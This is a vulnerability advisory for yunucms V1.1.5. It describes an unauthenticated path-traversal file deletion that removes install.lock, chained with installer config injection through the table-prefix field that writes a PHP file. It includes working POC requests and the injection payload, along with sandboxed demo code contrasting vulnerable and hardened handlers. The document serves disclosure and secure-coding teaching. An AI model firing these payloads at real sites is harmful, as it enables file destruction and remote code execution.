Two issues were discovered in yunucms V1.1.5.
1. Arbitrary File Deletion
2. Launching a new installation process to execute PHP code
1. Arbitrary File Deletion: a remote attacker can unlink any file the web server process is allowed to delete.
The code that makes this possible is in /statics/ueditor/php/vendor/Local.class.php, lines 34-68 (the remove() function; not reproduced here).
In the remove() function referenced above, the contents of $_POST['key'] are passed to unlink() without any authentication check or path sanitization, so a key containing ".." escapes the uploads directory.
POC
URL: /statics/ueditor/php/controller.php?action=remove
POST body: key=/uploads/../data/install.lock
Result: /data/install.lock is deleted.
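The following is an added example and not yunucms code: removeUnsafe() is a hypothetical function in the shape the report describes (the POSTed key is joined to the web root and handed straight to unlink()), and removeSafe() is a hardened version that canonicalises the path and refuses anything that does not resolve below uploads/. The sandbox directory, the function names and the file names are assumptions made for the demo.

```php
<?php
// Added example, not yunucms code. removeUnsafe() is a hypothetical function in
// the shape the report describes (the POSTed key goes straight to unlink());
// removeSafe() confines deletion to the uploads directory.

// Constructed sandbox standing in for the web root, with an uploads dir and
// the install lock the report's payload targets.
$root = sys_get_temp_dir() . '/yunu_demo_' . getmypid();
mkdir("$root/uploads/image", 0700, true);
mkdir("$root/data", 0700, true);
file_put_contents("$root/uploads/image/a.jpg", 'x');
file_put_contents("$root/data/install.lock", 'locked');

// Vulnerable shape: the client-supplied key is appended to the web root and
// unlinked; "/uploads/../data/install.lock" walks out of uploads/.
function removeUnsafe(string $root, string $key): bool
{
    return @unlink($root . $key);
}

// Hardened: canonicalise both base and target with realpath() (which also
// follows symlinks), then require the target to sit below uploads/.
function removeSafe(string $root, string $key): bool
{
    $base   = realpath("$root/uploads");
    $target = realpath($root . '/' . ltrim($key, '/'));
    if ($base === false || $target === false) {
        return false;                          // no such file: nothing to delete
    }
    // Compare against "uploads/" with the separator so "uploadsX/..." cannot match.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;                          // resolved outside uploads/: refuse
    }
    if (!is_file($target)) {
        return false;                          // directories are not deleted
    }
    return unlink($target);
}

$key = '/uploads/../data/install.lock';       // the payload from the report

echo 'unsafe: ', removeUnsafe($root, $key) ? 'install.lock deleted' : 'kept', "\n";
file_put_contents("$root/data/install.lock", 'locked');    // restore for the next run
echo 'safe:   ', removeSafe($root, $key) ? 'install.lock deleted' : 'refused', "\n";
echo 'safe:   ', removeSafe($root, 'uploads/image/a.jpg') ? 'a.jpg deleted' : 'refused', "\n";

// Clean up the sandbox.
@unlink("$root/data/install.lock");
@unlink("$root/uploads/image/a.jpg");
foreach (["$root/uploads/image", "$root/uploads", "$root/data", $root] as $d) {
    rmdir($d);
}
```

The path check alone is not the whole fix: the report's endpoint is reachable without authentication, so the real handler also needs to verify the caller's session before any delete. Checking the resolved path (after realpath) rather than the raw string is what defeats both ".." segments and symlinks planted inside uploads/.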
2. Launching a new installation process to execute PHP code
Once /data/install.lock has been removed, a remote attacker can launch a new installation process.
The code that makes this possible is in /statics/app/index/controller/Install.php, lines 117-131 (not reproduced here).
It calls setConfigfile() in /app/admin/common.php, lines 76-87, which uses file_put_contents() to write $arr into $file (config\database.php) as PHP source. The submitted values, including the table prefix, are embedded in that file without escaping.
POC
In installation step setup2, enter the following into the 数据表前缀 (table prefix) field, DB_PREFIX:
yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'
When the installation process finishes, the generated /data/database.php contains the payload as live PHP code (the resulting file is not reproduced here).
Visiting the homepage (http://127.0.0.1:81) loads the config file, runs the injected die(file_put_contents(...)) call, and creates /uploads/image/f4ck.php.
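As an added example (not yunucms code), the block below shows why a config file written by string concatenation turns an attacker-controlled DB_PREFIX into executable PHP, and how var_export() plus an allow-list on the prefix keeps it inert. buildConfigUnsafe() is a hypothetical writer modeled on the report's description of setConfigfile(); buildConfigSafe() and staysDataOnly() are hardened and checking helpers written for this example; the config key names are assumptions.

```php
<?php
// Added example, not yunucms code. buildConfigUnsafe() is a hypothetical writer in
// the shape the report describes for setConfigfile(): each submitted value is
// dropped between literal quotes and written out as PHP. buildConfigSafe() is
// the hardened form. staysDataOnly() tokenises the generated file and reports
// whether anything other than a data-only return statement is present.

// The DB_PREFIX value from the report's POC (nowdoc: no escaping applied).
$payload = <<<'EOT'
yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'
EOT;

// Hypothetical unsafe writer: a quote in $v ends the literal and the rest of
// the value becomes live PHP the next time the config file is included.
function buildConfigUnsafe(array $conf): string
{
    $out = "<?php\nreturn [\n";
    foreach ($conf as $k => $v) {
        $out .= "    '$k' => '$v',\n";
    }
    return $out . "];\n";
}

// Hardened writer: allow-list the prefix (it only ever names tables) and let
// var_export() quote and escape every value, so nothing can leave the string.
function buildConfigSafe(array $conf): string
{
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $conf['prefix'])) {
        throw new InvalidArgumentException('DB_PREFIX must match [A-Za-z0-9_]{1,32}');
    }
    return "<?php\nreturn " . var_export($conf, true) . ";\n";
}

// A config file should consist only of: open tag, return, whitespace, array(),
// string literals, => and punctuation. Any other token means code was injected.
function staysDataOnly(string $src): bool
{
    $allowedTokens = [T_OPEN_TAG, T_RETURN, T_WHITESPACE, T_ARRAY,
                      T_CONSTANT_ENCAPSED_STRING, T_DOUBLE_ARROW];
    $allowedChars  = ['[', ']', '(', ')', ',', ';'];
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) ? !in_array($tok[0], $allowedTokens, true)
                           : !in_array($tok, $allowedChars, true)) {
            return false;
        }
    }
    return true;
}

// Constructed installer input (hypothetical key names); only the prefix is hostile.
$conf = [
    'type'     => 'mysql',
    'hostname' => '127.0.0.1',
    'database' => 'yunucms',
    'username' => 'root',
    'password' => 'secret',
    'prefix'   => $payload,
];

echo 'unsafe writer: ', staysDataOnly(buildConfigUnsafe($conf))
    ? 'data only' : 'die()/file_put_contents() are now live code', "\n";

// Same values quoted by var_export(): the payload is an inert string literal.
echo 'var_export:    ', staysDataOnly("<?php\nreturn " . var_export($conf, true) . ";\n")
    ? 'data only' : 'code leaked', "\n";

try {
    buildConfigSafe($conf);
} catch (InvalidArgumentException $e) {
    echo 'safe writer:   rejected: ', $e->getMessage(), "\n";
}
```

The two issues chain: install.lock is the installer's only gate, so any primitive that deletes one file becomes code execution through the config writer. Escaping with var_export() closes the injection; the allow-list on DB_PREFIX is defence in depth, since a table prefix has no legitimate need for quotes, brackets or backslashes.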